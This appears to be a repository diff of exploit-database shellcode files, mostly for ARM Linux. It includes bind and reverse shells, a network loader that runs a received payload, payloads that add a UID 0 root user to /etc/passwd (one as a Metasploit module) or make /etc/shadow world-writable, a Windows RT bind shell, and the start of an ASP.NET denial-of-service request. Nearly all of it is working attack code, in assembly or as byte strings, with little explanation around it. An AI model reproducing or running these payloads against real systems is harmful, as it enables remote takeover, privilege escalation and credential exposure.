push {%r0, %r1, %r2}
mov %r0, $1 /* socket */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $12
mov %r6, %r0 /* r6 = soc_des */
/*
bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
*/
.if 0 /* r0 == r6 already */
mov %r0, %r6 /* soc_des */
.endif
mov %r1, $0x37
mov %r7, $0x13
mov %r1, %r1, lsl $24
add %r1, %r7, lsl $16
add %r1, $2 /* port = 0x1337, family = 2 (AF_INET) */
sub %r2, %r2, %r2 /* addr = 0.0.0.0 */
push {%r1, %r2}
mov %r1, %sp /* pointer to sockaddr_in */
mov %r2, $16 /* sizeof(struct sockaddr_in) */
push {%r0, %r1, %r2}
mov %r0, $2 /* bind */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $20
/*
listen(soc_des, 1);
/*
mov %r1, $1 /* backlog (see man 2 listen) */
mov %r0, %r6 /* soc_des */
push {%r0, %r1}
mov %r0, $4 /* listen */
mov %r1, %sp
svc 0x00900066
add %sp, $8
/*
soc_cli = accept(soc_des, 0, 0);
*/
mov %r0, %r6 /* soc_des */
sub %r1, %r1, %r1
sub %r2, %r2, %r2
push {%r0, %r1, %r2}
mov %r0, $5 /* accept */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $12
mov %r6, %r0 /* r6 = soc_cli */
/*
dup2(soc_cli,0);
dup2(soc_cli,1);
dup2(soc_cli,2);
*/
mov %r1, $2
1: mov %r0, %r6
svc 0x0090003f
subs %r1, %r1, $1
bpl 1b
/*
execve("/bin/sh", parms, env);
*/
sub %r1, %sp, $4 /* argv[0] = "sh" */
sub %r2, %r2, %r2 /* argv[1] = 0x00000000 */
mov %r3, $0x2f
mov %r7, $0x62
add %r3, %r7, lsl $8
mov %r7, $0x69
add %r3, %r7, lsl $16
mov %r7, $0x6e
add %r3, %r7, lsl $24 /* '/' 'b' 'i' 'n' */
mov %r4, $0x2f
mov %r7, $0x73
add %r4, %r7, lsl $8
mov %r7, $0x68
add %r4, %r7, lsl $16 /* '/' 's' 'h' 0x00 */
mov %r5, $0x73
mov %r7, $0x68
add %r5, %r7, lsl $8 /* 's' 'h' 0x00 0x00 */
push {%r1, %r2, %r3, %r4, %r5}
add %r0, %sp, $8 /* filename ptr */
add %r1, %sp, $0 /* argv ptr */
add %r2, %sp, $4 /* env ptr */
svc 0x0090000b

118
platforms/arm/shellcode/15315.S Executable file
View file

@ -0,0 +1,118 @@
/*
* Title: arm-bind-connect-udp
* Brief: Bind to port 68 on any local address and plug a udp shell
* onto to port 67 on 192.168.0.1
* Author: Daniel Godas-Lopez <gmail account dgodas>
*/
.if 1
/*
close(3), close(4), ..., close(1024)
*/
mov %r1, $1024
1: mov %r0, %r1
svc 0x00900006
subs %r1, %r1, $1
subs %r2, %r1, $3
bpl 1b
.endif
/*
soc_des = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
*/
mov %r0, $2 /* AF_INET */
mov %r1, $2 /* SOCK_DGRAM */
mov %r2, $17 /* IPPRTOTO_UDP */
push {%r0, %r1, %r2}
mov %r0, $1 /* socket */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $12
mov %r6, %r0 /* r6 = soc_des */
/*
bind(soc_des, (struct sockaddr*) &serv_addr, sizeof(serv_addr));
*/
.if 0 /* r0 == r6 already */
mov %r0, %r6 /* soc_des */
.endif
mov %r1, $0x44000000
add %r1, $2 /* port = 68, family = 2 (AF_INET) */
sub %r2, %r2, %r2 /* addr = 0.0.0.0 */
push {%r1, %r2}
mov %r1, %sp /* pointer to sockaddr_in */
mov %r2, $16 /* sizeof(struct sockaddr_in) */
push {%r0, %r1, %r2}
mov %r0, $2 /* bind */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $20
/*
connect(soc_des, (struct sockaddr*) &cli_addr, sizeof(cli_addr));
*/
mov %r0, %r6 /* soc_des */
mov %r1, $0x43000000
add %r1, $2 /* port = 67, family = 2 (AF_INET) */
mov %r2, $0x1000000
add %r2, %r2, $0xa800
add %r2, $0xc0 /* addr = 192.168.0.1 */
push {%r1, %r2}
mov %r1, %sp /* pointer to sockaddr_in */
mov %r2, $16 /* sizeof(struct sockaddr_in) */
push {%r0, %r1, %r2}
mov %r0, $3 /* connect */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $20
/*
dup2(soc_cli,0);
dup2(soc_cli,1);
dup2(soc_cli,2);
*/
mov %r1, $2
1: mov %r0, %r6
svc 0x0090003f
subs %r1, %r1, $1
bpl 1b
/*
execve("/bin/sh", parms, env);
*/
sub %r1, %sp, $4 /* argv[0] = "sh" */
sub %r2, %r2, %r2 /* argv[1] = 0x00000000 */
mov %r3, $0x2f
mov %r7, $0x62
add %r3, %r7, lsl $8
mov %r7, $0x69
add %r3, %r7, lsl $16
mov %r7, $0x6e
add %r3, %r7, lsl $24 /* '/' 'b' 'i' 'n' */
mov %r4, $'/'
mov %r7, $'s'
add %r4, %r7, lsl $8
mov %r7, $'h'
add %r4, %r7, lsl $16 /* '/' 's' 'h' 0x00 */
mov %r5, $'s'
mov %r7, $'h'
add %r5, %r7, lsl $8 /* 's' 'h' 0x00 0x00 */
push {%r1, %r2, %r3, %r4, %r5}
add %r0, %sp, $8 /* filename ptr */
add %r1, %sp, $0 /* argv ptr */
add %r2, %sp, $4 /* env ptr */
svc 0x0090000b

99
platforms/arm/shellcode/15316.S Executable file
View file

@ -0,0 +1,99 @@
/*
* Title: arm-loader
* Brief: Bind port 0x1337 on any local interface, listen for a connection
* receive a payload, and pass execution to it
* Author: Daniel Godas-Lopez <gmail account dgodas>
*/
/*
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
*/
mov %r0, $2 /* AF_INET */
mov %r1, $1 /* SOCK_STREAM */
mov %r2, $6 /* IPPRTOTO_TCP */
push {%r0, %r1, %r2}
mov %r0, $1 /* socket */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $12
mov %r6, %r0 /* r6 = soc_des */
/*
bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
*/
.if 0 /* r0 == r6 already */
mov %r0, %r6 /* soc_des */
.endif
mov %r1, $0x37
mov %r7, $0x13
mov %r1, %r1, lsl $24
add %r1, %r7, lsl $16
add %r1, $2 /* port = 0x1337, family = 2 (AF_INET) */
sub %r2, %r2, %r2 /* addr = 0.0.0.0 */
push {%r1, %r2}
mov %r1, %sp /* pointer to sockaddr_in */
mov %r2, $16 /* sizeof(struct sockaddr_in) */
push {%r0, %r1, %r2}
mov %r0, $2 /* bind */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $20
/*
listen(soc_des, 1);
/*
mov %r1, $1 /* backlog (see man 2 listen) */
mov %r0, %r6 /* soc_des */
push {%r0, %r1}
mov %r0, $4 /* listen */
mov %r1, %sp
svc 0x00900066
add %sp, $8
/*
soc_cli = accept(soc_des, 0, 0);
*/
mov %r0, %r6 /* soc_des */
sub %r1, %r1, %r1
sub %r2, %r2, %r2
push {%r0, %r1, %r2}
mov %r0, $5 /* accept */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $12
mov %r6, %r0 /* r6 = soc_cli */
/*
recv(soc_des, buff, len, flags);
*/
sub %r4, %sp, $316 /* buffer on the stack + 16 bytes padding */
sub %r5, %r5, %r5 /* byte count */
1: mov %r0, %r6
add %r1, %r4, %r5 /* dst pointer */
mov %r2, $300 /* 300 bytes */
mov %r3, $256 /* MSG_WAITALL */
push {%r0, %r1, %r2, %r3}
mov %r0, $10 /* recv */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $16
add %r5, %r0
cmp %r5, $300
bne 1b
/*
Jump into code
*/
mov %pc, %r4

76
platforms/arm/shellcode/15317.S Executable file
View file

@ -0,0 +1,76 @@
/*
* Title: arm-ifconfig
* Brief: Bring up eth0 and assign it the address 192.168.0.2
* Author: Daniel Godas-Lopez <gmail account dgodas>
*/
/*
soc_des = socket(AF_INET, SOCK_DGRAM, IPPROTO_IP);
*/
mov %r0, $2 /* AF_INET */
mov %r1, $2 /* SOCK_DGRAM */
mov %r2, $0 /* IPPRTOTO_IP */
push {%r0, %r1, %r2}
mov %r0, $1 /* socket */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $12
mov %r6, %r0 /* r6 = soc_des */
/*
ioctl(soc_des, SIOCSIFADDR, &req);
*/
.if 0 /* r0 == r6 already */
mov %r0, %r6 /* soc_des */
.endif
sub %r1, %r1, %r1
sub %r2, %r2, %r2
push { %r1, %r2 }
mov %r2, $2 /* AF_INET */
mov %r3, $0x2000000
add %r3, %r3, $0xa800
add %r3, $0xc0 /* addr = 192.168.0.2 */
push { %r2, %r3 }
sub %r2, %r2, %r2
sub %r3, %r3, %r3
push { %r1, %r2, %r3 }
mov %r3, $0x7400
add %r3, $0x0065
mov %r4, $0x3000
add %r4, $0x0068
add %r3, %r4, lsl $16 /* "eth0" */
push { %r3 }
mov %r2, %sp /* struct __kernel_ifreq */
add %sp, $32
mov %r1, $0x8900
add %r1, %r1, $0x16 /* SIOCSIFADDR */
svc 0x00900036
/*
ioctl(soc_des, SIOCGIFFLAGS, &req);
*/
mov %r0, %r6 /* soc_des */
mov %r1, $0x8900
add %r1, %r1, $0x13 /* SIOCGIFFLAGS */
svc 0x00900036
ldr %r3, [%r2, $16]
orr %r3, %r3, $1
str %r3, [%r2, $16] /* ifr_flags |= IFF_UP */
/*
ioctl(soc_des, SIOCSIFFLAGS, &req);
*/
mov %r0, %r6 /* soc_des */
mov %r1, $0x8900
add %r1, %r1, $0x14 /* SIOCSIFFLAGS */
svc 0x00900036

82
platforms/arm/shellcode/15616.c Executable file
View file

@ -0,0 +1,82 @@
/*
** Title: Linux/ARM - add root user with password - 151 bytes
** Date: 2010-11-25
** Tested on: ARM926EJ-S rev 5 (v5l)
** Author: Jonathan Salwan - twitter: @shell_storm
**
** http://shell-storm.org
**
** Informations:
** -------------
** - user: shell-storm
** - pswd: toor
** - uid : 0
*/
#include <stdio.h>
char SC[] =
/* Thumb mode */
"\x05\x50\x45\xe0" /* sub r5, r5, r5 */
"\x01\x50\x8f\xe2" /* add r5, pc, #1 */
"\x15\xff\x2f\xe1" /* bx r5 */
/* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */
"\x78\x46" /* mov r0, pc */
"\x7C\x30" /* adds r0, #124 */
"\xff\x21" /* movs r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\x45\x31" /* adds r1, #69 */
"\xdc\x22" /* movs r2, #220 */
"\xc8\x32" /* adds r2, #200 */
"\x05\x27" /* movs r7, #5 */
"\x01\xdf" /* svc 1 */
/* r8 = fd */
"\x80\x46" /* mov r8, r0 */
/* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72) */
"\x41\x46" /* mov r1, r8 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x79\x46" /* mov r1, pc */
"\x18\x31" /* adds r1, #24 */
"\xc0\x46" /* nop (mov r8, r8) */
"\x48\x22" /* movs r2, #72 */
"\x04\x27" /* movs r7, #4 */
"\x01\xdf" /* svc 1 */
/* close(fd) */
"\x41\x46" /* mov r1, r8 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x06\x27" /* movs r7, #6 */
"\x01\xdf" /* svc 1 */
/* exit(0) */
"\x1a\x49" /* subs r1, r1, r1 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x01\x27" /* movs r7, #1 */
"\x01\xdf" /* svc 1 */
/* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n */
"\x73\x68\x65\x6c\x6c\x2d\x73\x74\x6f\x72"
"\x6d\x3a\x24\x31\x24\x4b\x51\x59\x6c\x2f"
"\x79\x72\x75\x24\x50\x4d\x74\x30\x32\x7a"
"\x55\x54\x57\x6d\x4d\x76\x50\x57\x63\x55"
"\x34\x6f\x51\x4c\x73\x2f\x3a\x30\x3a\x30"
"\x3a\x72\x6f\x6f\x74\x3a\x2f\x72\x6f\x6f"
"\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73"
"\x68\x0a"
/* /etc/passwd */
"\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC));
(*(void(*)()) SC)();
return 0;
}

72
platforms/arm/shellcode/15712.rb Executable file
View file

@ -0,0 +1,72 @@
# Exploit Title: Linux/ARM - Create a new user with UID 0 (MSF)
# Date: 2010-11-25
# Author: Jonathan Salwan - twitter @jonathansalwan
# Tested on: ARM926EJ-S rev 5 (v5l)
# Issue link: https://metasploit.com/redmine/issues/3254
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
###
#
# AddUser
# -------
#
# Adds a UID 0 user to /etc/passwd.
#
###
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Linux
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Add User',
'Version' => '???',
'Description' => 'Create a new user with UID 0',
'Author' => [ 'Jonathan Salwan' ],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'Privileged' => true))
# Register adduser options
register_options(
[
OptString.new('USER', [ true, "The username to create", "metasploit" ]),
OptString.new('PASS', [ true, "The password for this user", "metasploit" ]),
OptString.new('SHELL', [ false, "The shell for this user", "/bin/sh" ]),
], self.class)
end
#
# Dynamically builds the adduser payload based on the user's options.
#
def generate_stage
user = datastore['USER'] || 'metasploit'
pass = datastore['PASS'] || 'metasploit'
shell = datastore['SHELL'] || '/bin/sh'
str = "#{user}:#{pass.crypt('Az')}:0:0::/:#{shell}\n"
strl1 = [ (str.length)+52 ].pack('C*')
strl2 = [ str.length ].pack('C*')
pwdir = "/etc/passwd"
payload =
"\x05\x50\x45\xe0\x01\x50\x8f\xe2\x15\xff\x2f\xe1" +
"\x78\x46"+ strl1 + "\x30\xff\x21\xff\x31\xff\x31" +
"\xff\x31\x45\x31\xdc\x22\xc8\x32\x05\x27\x01\xdf" +
"\x80\x46\x41\x46\x08\x1c\x79\x46\x18\x31\xc0\x46" +
strl2 + "\x22\x04\x27\x01\xdf\x41\x46\x08\x1c\x06" +
"\x27\x01\xdf\x1a\x49\x08\x1c\x01\x27\x01\xdf" +
str + pwdir
end
end

90
platforms/arm/shellcode/21252.asm Executable file
View file

@ -0,0 +1,90 @@
/*
Title: Linux/ARM - reverse_shell(tcp,10.1.1.2,0x1337)
execve("/bin/sh", [0], [0 vars]) - 72 bytes
Date: 2012-09-08
Tested on: ARM1176JZF-S (v6l) - Raspberry Pi
Author: midnitesnake
00008054 <_start>:
8054: e28f1001 add r1, pc, #1
8058: e12fff11 bx r1
805c: 2002 movs r0, #2
805e: 2101 movs r1, #1
8060: 1a92 subs r2, r2, r2
8062: 020f lsls r7, r1, #8
8064: 3719 adds r7, #25
8066: df01 svc 1
8068: 1c06 adds r6, r0, #0
806a: a108 add r1, pc, #32 ; (adr r1,
808c <Dup+0x16>)
806c: 2210 movs r2, #16
806e: 3702 adds r7, #2
8070: df01 svc 1
8072: 273f movs r7, #63 ; 0x3f
8074: 2102 movs r1, #2
00008076 <Dup>:
8076: 1c30 adds r0, r6, #0
8078: df01 svc 1
807a: 3901 subs r1, #1
807c: d5fb bpl.n 8076 <Dup>
807e: a005 add r0, pc, #20 ; (adr r0,
8094 <Dup+0x1e>)
8080: 1a92 subs r2, r2, r2
8082: b405 push {r0, r2}
8084: 4669 mov r1, sp
8086: 270b movs r7, #11
8088: df01 svc 1
808a: 46c0 nop ; (mov r8, r8)
808c: 37130002 .word 0x37130002
8090: 0301010a .word 0x0301010a
8094: 6e69622f .word 0x6e69622f
8098: 0068732f .word 0x0068732f
809c: 00 .byte 0x00
809d: 00 .byte 0x00
809e: 46c0 nop ; (mov r8, r8)
*/
#include <stdio.h>
#include <string.h>
#define SWAP16(x) ((x) << 8 | ((x) >> 8))
const unsigned char sc[] = {
0x01, 0x10, 0x8F, 0xE2,
0x11, 0xFF, 0x2F, 0xE1,
0x02, 0x20, 0x01, 0x21,
0x92, 0x1a, 0x0f, 0x02,
0x19, 0x37, 0x01, 0xdf,
0x06, 0x1c, 0x08, 0xa1,
0x10, 0x22, 0x02, 0x37,
0x01, 0xdf, 0x3f, 0x27,
0x02, 0x21,
0x30, 0x1c, 0x01, 0xdf,
0x01, 0x39, 0xfb, 0xd5,
0x05, 0xa0, 0x92, 0x1a,
0x05, 0xb4, 0x69, 0x46,
0x0b, 0x27,0x01, 0xdf,
0xc0, 0x46,
/* struct sockaddr */
0x02, 0x00,
/* port: 0x1337 */
0x13, 0x37,
/* ip: 10.1.1.2 */
0x0A, 0x01, 0x01, 0x02,
/* "/bin/sh\0" */
0x2f, 0x62, 0x69, 0x6e,0x2f, 0x73, 0x68, 0x00
};
int main()
{
printf("shellcode=%d bytes\n"
"connecting to %d.%d.%d.%d:%hd\n", sizeof sc,
sc[0x3c], sc[0x3d], sc[0x3e], sc[0x3f],
SWAP16(*((unsigned short *)(sc+0x3a))));
return ((int (*)(void))sc)();
}

42
platforms/arm/shellcode/21253.asm Executable file
View file

@ -0,0 +1,42 @@
/*
Title: Linux/ARM - execve("/bin/sh", [0], [0 vars]) - 30 bytes
Date: 2012-09-08
Tested on: ARM1176JZF-S (v6l)
Author: midnitesnake
00008054 <_start>:
8054: e28f6001 add r6, pc, #1
8058: e12fff16 bx r6
805c: 4678 mov r0, pc
805e: 300a adds r0, #10
8060: 9001 str r0, [sp, #4]
8062: a901 add r1, sp, #4
8064: 1a92 subs r2, r2, r2
8066: 270b movs r7, #11
8068: df01 svc 1
806a: 2f2f .short 0x2f2f
806c: 2f6e6962 .word 0x2f6e6962
8070: 00006873 .word 0x00006873
*/
#include <stdio.h>
char *SC = "\x01\x60\x8f\xe2"
"\x16\xff\x2f\xe1"
"\x78\x46"
"\x0a\x30"
"\x01\x90"
"\x01\xa9"
"\x92\x1a"
"\x0b\x27"
"\x01\xdf"
"\x2f\x2f"
"\x62\x69"
"\x6e\x2f"
"\x73\x68\x00\x00";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC));
(*(void(*)()) SC)();
return 0;
}

54
platforms/arm/shellcode/21254.asm Executable file
View file

@ -0,0 +1,54 @@
/*
Title: Linux/ARM - chmod("/etc/shadow", 0777) - 41 bytes
Date: 2012-09-08
Tested on: ARM1176JZF-S (v6l)
Author: midnitesnake
00008054 <_start>:
8054: e28f6001 add r6, pc, #1
8058: e12fff16 bx r6
805c: 4678 mov r0, pc
805e: 3012 adds r0, #18
8060: 21ff movs r1, #255 ; 0xff
8062: 31ff adds r1, #255 ; 0xff
8064: 3101 adds r1, #1
8066: 270f movs r7, #15
8068: df01 svc 1
806a: 1b24 subs r4, r4, r4
806c: 1c20 adds r0, r4, #0
806e: 2701 movs r7, #1
8070: df01 svc 1
8072: 652f .short 0x652f
8074: 732f6374 .word 0x732f6374
8078: 6f646168 .word 0x6f646168
807c: 46c00077 .word 0x46c00077
*/
#include <stdio.h>
char shellcode[] = "\x01\x60\x8f\xe2"
"\x16\xff\x2f\xe1"
"\x78\x46"
"\x12\x30"
"\xff\x21"
"\xff\x31"
"\x01\x31"
"\x0f\x27"
"\x01\xdf"
"\x24\x1b"
"\x20\x1c"
"\x01\x27"
"\x01\xdf"
"\x2f\x65"
"\x74\x63\x2f\x73"
"\x68\x61\x64\x6f"
"\x77\x00"
"\xc0\x46";
int main()
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}

248
platforms/arm/shellcode/27180.asm Executable file
View file

@ -0,0 +1,248 @@
; Title: Windows RT ARM Bind Shell (Port 4444)
; Date: July 28, 2013
; Author: Matthew Graeber (@mattifestation)
; Blog post: http://www.exploit-monday.com/2013/07/WinRT-ARM-Shellcode.html
; Tested on: Microsoft Surface RT Tablet w/ Windows RT (6.2.9200)
; License: BSD 3-Clause
; Syntax: MASM
; Notes: In order for this to work properly, you have to call this payload
; at baseaddress + 1 since it is thumb code.
; This was built with armasm.exe from Visual Studio 2012
AREA |.foo|, CODE, THUMB
; After linking, the resulting executable will only
; have a single section (with RX permissions) named .foo
EXPORT main
main
push {r4,lr} ; Preserve registers on the stack
bl ExecutePayload ; Execute bind shell function
pop {r4,pc} ; Restore registers on the stack and return to caller
GetProcAddress
; ARM (Thumb) implementation of the logic from the Metasploit x86 block_api shellcode
push {r1-r11,lr} ; Preserve registers on the stack
mov r9,r0 ; Save the function hash in R9
mrc p15,#0,r3,c13,c0,#2 ; R3 = &TEB
ldr r3,[r3,#0x30] ; R3 = &PEB
ldr r3,[r3,#0xC] ; R3 = PEB->Ldr
movs r6,#0 ; R6 = 0
ldr r1,[r3,#0xC] ; R1 = Ldr->InLoadOrderModuleList
ldr r4,[r1,#0x18] ; R4 = LDR_DATA_TABLE_ENTRY.DllBase
ldr r3,[r1,#0x2C] ; R3 = LDR_DATA_TABLE_ENTRY.BaseDllName
ldr r7,[r1,#0x30] ; R7 = LDR_DATA_TABLE_ENTRY.BaseDllName.Buffer
str r3,[sp] ; Store BaseDllName.Length/MaximumLength on the stack
cbz r4,exit_failure ; If DllBase == 0, you've likely reached the end of the module list. Return 0.
mov r10,#0xD ; R10 = ROR value (13)
mov r11,#0xD ; R11 = ROR value (13)
get_module_hash ; Improvement: Need to validate MaximumLength != 0
ldrh r5,[sp,#2] ; BaseDllName.MaximumLength
movs r2,#0 ; i = 0
cbz r5,get_export_dir ; Reached the last char of BaseDllName
ror_module_char
ldrsb r3,[r7,r2] ; R3 = (CHAR) *((PCSTR) BaseDllName.Buffer + i)
rors r0,r6,r10 ; Calculate the next portion of the module hash
cmp r3,#0x61 ; Is the character lower case?
blt notlowercase
adds r3,r3,r0 ; Add to the running hash value
subs r6,r3,#0x20 ; Convert character to upper case
b get_next_char
notlowercase
adds r6,r3,r0 ; Add to the running hash value
get_next_char
adds r2,#1 ; Move to the next character
cmp r2,r5 ; Reached the last character in the module name?
bcc ror_module_char ; If not, move on to the next character
get_export_dir
; At this point, the module hash has been calculated.
; Now begin calculating the function hash
ldr r3,[r4,#0x3C] ; IMAGE_DOS_HEADER.e_lfanew - i.e. offset to PE IMAGE_NT_HEADERS
adds r3,r3,r4 ; PIMAGE_NT_HEADERS
ldr r3,[r3,#0x78] ; IMAGE_DIRECTORY_ENTRY_EXPORT.VirtualAddress (only an RVA at this point)
cbz r3,get_next_module ; Move to the next module if it doesn't have an export directory (i.e. most exe files)
adds r5,r3,r4 ; Calculate export dir virtual address
ldr r3,[r5,#0x20] ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfNames
ldr r7,[r5,#0x18] ; R7 = PIMAGE_EXPORT_DIRECTORY->NumberOfNames
movs r0,#0
adds r8,r3,r4 ; AddressOfNames VA
cbz r7,get_next_module ; Move on to the next module if there are no exported names
calc_func_hash
ldr r3,[r8],#4 ; R3 = Current name RVA
movs r2,#0
adds lr,r3,r4 ; lr = Current name VA
get_func_char
ldrsb r3,[lr] ; Load char from the function name
rors r2,r2,r11 ; Calculate the next portion of the function hash
adds r2,r2,r3 ; Add to the running hash value
ldrsb r3,[lr],#1 ; Peek at the next char
cmp r3,#0 ; Are you at the end of the function string?
bne get_func_char ; If not, calculate hash for the next char.
adds r3,r2,r6 ; Add the module hash to the function hash
cmp r3,r9 ; Does the calulated hash match the hash provided?
beq get_func_addr
adds r0,#1
cmp r0,r7 ; Are there more functions to process?
bcc calc_func_hash
get_next_module
ldr r1,[r1] ; LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink
movs r6,#0 ; Clear the function hash
; Improvement: The following portion is redundant
ldr r4,[r1,#0x18] ; R4 = LDR_DATA_TABLE_ENTRY.DllBase
ldr r3,[r1,#0x2C] ; R3 = LDR_DATA_TABLE_ENTRY.BaseDllName
ldr r7,[r1,#0x30] ; R7 = LDR_DATA_TABLE_ENTRY.BaseDllName.Buffer
cmp r4,#0 ; DllBase == 0?
str r3,[sp] ; Store BaseDllName.Length/MaximumLength on the stack
bne get_module_hash
exit_failure
movs r0,#0 ; Return 0 upon failure to find a matching hash
exit_success
pop {r1-r11,pc} ; Restore stack and return to caller with the function address in R0
get_func_addr
ldr r3,[r5,#0x24] ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals
add r3,r3,r0,lsl #1
ldrh r2,[r3,r4] ; R2 = Ordinal table index
ldr r3,[r5,#0x1C] ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfFunctions
add r3,r3,r2,lsl #2
ldr r3,[r3,r4] ; Function RVA
adds r0,r3,r4 ; R0 = Function VA
b exit_success
ExecutePayload
; Improvement: None of the calls to GetProcAddress
; validate that a valid address was actually returned
; Metasploit shellcode doesn't perform this validation either. :P
push {r4-r11,lr} ; Preserve registers on the stack
subw sp,sp,#0x214 ; Allocate soace on the stack for local variables
movs r3,#0x44 ; sizeof(_PROCESS_INFORMATION)
add r2,sp,#0x38 ; R2 = &StartupInfo
movs r1,#0
init_mem1
; Improvement: I could just initialize everything on the stack to 0
strb r1,[r2],#1 ; Set current byte to 0
subs r3,#1
bne init_mem1
movs r3,#0x10 ; sizeof(_STARTUPINFOW)
add r2,sp,#0x28 ; R2 = &ProcessInformation
init_mem2
strb r1,[r2],#1 ; Set current byte to 0
subs r3,#1
bne init_mem2
ldr r0,HASH_LoadLibraryA
bl GetProcAddress
mov r3,r0
adr r0,module_name ; &"ws2_32.dll"
blx r3 ; LoadLibrary("ws2_32.dll");
ldr r0,HASH_WsaStartup
bl GetProcAddress
mov r4,r0
ldr r0,HASH_WsaSocketA
bl GetProcAddress
mov r5,r0
ldr r0,HASH_Bind
bl GetProcAddress
mov r6,r0
ldr r0,HASH_Listen
bl GetProcAddress
mov r7,r0
ldr r0,HASH_Accept
bl GetProcAddress
mov r8,r0
ldr r0,HASH_CloseSocket
bl GetProcAddress
mov r9,r0
ldr r0,HASH_CreateProcess
bl GetProcAddress
mov r10,r0
ldr r0,HASH_WaitForSingleObject
bl GetProcAddress
mov r11,r0
mov r0,#0x0202
add r1,sp,#0x80
blx r4 ; WSAStartup(MAKEWORD(2, 2), &WSAData);
movs r3,#0
movs r2,#0
movs r1,#1
movs r0,#2
str r3,[sp,#4]
str r3,[sp]
blx r5 ; s = WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
movs r3,#2 ; service.sin_family = AF_INET;
strh r3,[sp,#0x18]
movs r3,#0 ; service.sin_addr.s_addr = 0;
str r3,[sp,#0x1C]
mov r3,#0x5C11 ; service.sin_port = HTONS(4444);
movs r2,#0x10
add r1,sp,#0x18
strh r3,[sp,#0x1A]
mov r5,r0 ; WSASocketA returned socket (s)
blx r6 ; Bind( s, (SOCKADDR *) &service, sizeof(service) );
movs r1,#0
mov r0,r5
blx r7 ; Listen( s, 0 );
movs r2,#0
movs r1,#0
mov r0,r5
blx r8 ; AcceptedSocket = Accept( s, 0, 0 );
mov r4,r0
mov r0,r5
blx r9 ; CloseSocket( s ); Close the original socket
mov r3,#0x101 ; StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
str r3,[sp,#0x64]
movs r3,#0x44 ; StartupInfo.cb = 68;
str r3,[sp,#0x38]
add r3,sp,#0x28
str r3,[sp,#0x14]
add r3,sp,#0x38
str r3,[sp,#0x10]
movs r3,#0
str r3,[sp,#0xC]
str r3,[sp,#8]
str r3,[sp,#4]
movs r3,#1
adr r1,cmdline ; &"cmd"
str r3,[sp]
movs r3,#0
movs r2,#0
movs r0,#0
str r4,[sp,#0x78] ; StartupInfo.hStdError = (HANDLE) AcceptedSocket;
str r4,[sp,#0x74] ; StartupInfo.hStdOutput = (HANDLE) AcceptedSocket;
str r4,[sp,#0x70] ; StartupInfo.hStdInput = (HANDLE) AcceptedSocket;
blx r10 ; CreateProcessA( 0, "cmd", 0, 0, TRUE, 0, 0, 0, &StartupInfo, &ProcessInformation );
ldr r0,[sp,#0x28]
mvn r1,#0
blx r11 ; WaitForSingleObject( ProcessInformation.hProcess, INFINITE );
addw sp,sp,#0x214
pop {r4-r11,pc}
HASH_WaitForSingleObject
DCD 0x601d8708
HASH_CreateProcess
DCD 0x863fcc79
HASH_CloseSocket
DCD 0x614d6e75
HASH_Accept
DCD 0xe13bec74
HASH_Listen
DCD 0xff38e9b7
HASH_Bind
DCD 0x6737dbc2
HASH_WsaSocketA
DCD 0xe0df0fea
HASH_WsaStartup
DCD 0x006b8029
HASH_LoadLibraryA
DCD 0x0726774c
cmdline
DCB "cmd", 0x0
module_name
DCB "ws2_32.dll", 0x0
END

26
platforms/asp/dos/25962.xml Executable file
View file

@ -0,0 +1,26 @@
source: http://www.securityfocus.com/bid/14217/info
ASP.NET is susceptible to a remote denial of service vulnerability. This issue is due to the possibility of causing an infinite loop on the server when handling RPC/encoded requests.
This issue presents itself when an RPC/encoded Web method accepts an array or object derived from 'IList'. By sending a specially crafted XML request, the 'aspnet_wp.exe' executable enters into an infinite loop.
Remote attackers may exploit this vulnerability to consume excessive CPU resources, potentially denying service to legitimate users.
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:tns="http://tempuri.org/"
xmlns:types="http://tempuri.org/encodedTypes"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
